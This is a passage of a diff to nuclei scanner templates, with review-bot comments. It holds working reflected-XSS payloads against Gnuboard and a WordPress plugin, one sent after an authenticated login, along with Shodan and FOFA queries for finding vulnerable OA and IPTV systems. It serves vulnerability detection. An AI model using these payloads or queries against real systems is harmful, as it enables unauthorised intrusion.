- https://blog.csdn.net/ystyaoshengting/article/details/82734888
metadata:
verified: true
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms,redirect
requests:

@ -4,6 +4,8 @@ info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,lfi
requests:

@ -6,6 +6,8 @@ info:
severity: high
reference:
- https://www.weaver.com.cn/
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:

@ -6,6 +6,8 @@ info:
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:

@ -0,0 +1,35 @@
id: gnuboard-sms-xss
info:
name: Gnuboard CMS - SMS Emoticon XSS
author: gy741
severity: medium
description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
reference:
- https://sir.kr/g5_pds/4788?page=5
- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
metadata:
verified: true
shodan-query: http.html:"Gnuboard"
tags: xss,gnuboard
requests:
- method: GET
path:
- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"0nuboard<svg onload=alert(document.domain)>"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
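Review bot: the request sends `arr_ajax_msg=gnuboard<svg+onload=...>` but the matcher expects `"0nuboard<svg onload=alert(document.domain)>"`, with the leading `g` replaced by `0`; if that first-character substitution is what the endpoint does to its input, say so in a comment beside the matcher, otherwise the next person to "fix" the apparent typo will silently break detection. The `+` in the URL decodes to a space, so the `<svg onload=` form in the matcher is correct as written.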

@ -6,6 +6,8 @@ info:
severity: high
reference:
- https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
metadata:
fofa-query: title="蓝海卓越计费管理系统"
tags: natshell,lfi
requests:

@ -12,7 +12,11 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-78
tags: tamronos,rce
metadata:
verified: true
shodan-query: title:"TamronOS IPTV系统"
fofa-query: title="TamronOS IPTV系统"
tags: tamronos,rce
requests:
- method: GET

@ -1,12 +1,12 @@
id: yongyou-u8-oa-sqli
id: yonyou-u8-oa-sqli
info:
name: Yongyou U8 OA Sqli
name: Yonyou U8 OA Sqli
author: ritikchaddha
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: yongyou,u8,oa,sqli
tags: yonyou,oa,sqli
requests:
- method: GET

@ -0,0 +1,54 @@
id: seo-redirection-xss
info:
name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
remediation: Fixed in version 7.4.
reference:
- https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
tags: wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><svg/onload=alert(/XSS/)>"
- "settings_page_seo-redirection"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
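Review bot: the third request, `GET /wp-admin/admin.php?page=wpda_duplicate_post_menu`, is carried over from the CVE-2021-25075 (Duplicate Page) template and has nothing to do with SEO Redirection; the `settings_page_seo-redirection` body class the matcher looks for comes from the `options-general.php?page=seo-redirection.php` page requested in step two, so delete the third request. That second request also sends `tab=cutom` in the query string and the payload in the POST body at once; since the flaw is in the `tab` parameter, keep only the one that is reflected and say which in a comment.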

workflows/weblogic-workflow.yaml Executable file → Normal file

@ -0,0 +1,13 @@
id: yonyou-ufida-nc-workflow
info:
name: Yonyou Ufida NC Security Checks
author: Arm!tage
description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target.
workflows:
- template: technologies/fingerprinthub-web-fingerprints.yaml
matchers:
- name: yonyou-ism
subtemplates:
- tags: yonyou
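Review bot: the new-additions list names this file `workflows/yonyou-nc-workflow.yaml` but the template declares `id: yonyou-ufida-nc-workflow`; templates in this repo use the file name as the id, so rename one of the two. `subtemplates: - tags: yonyou` also runs every `yonyou`-tagged template, including the U8 OA SQLi renamed in this same change, once the NC-specific `yonyou-ism` fingerprint matches; either narrow the subtemplate selection to NC templates or name the workflow after Yonyou generally.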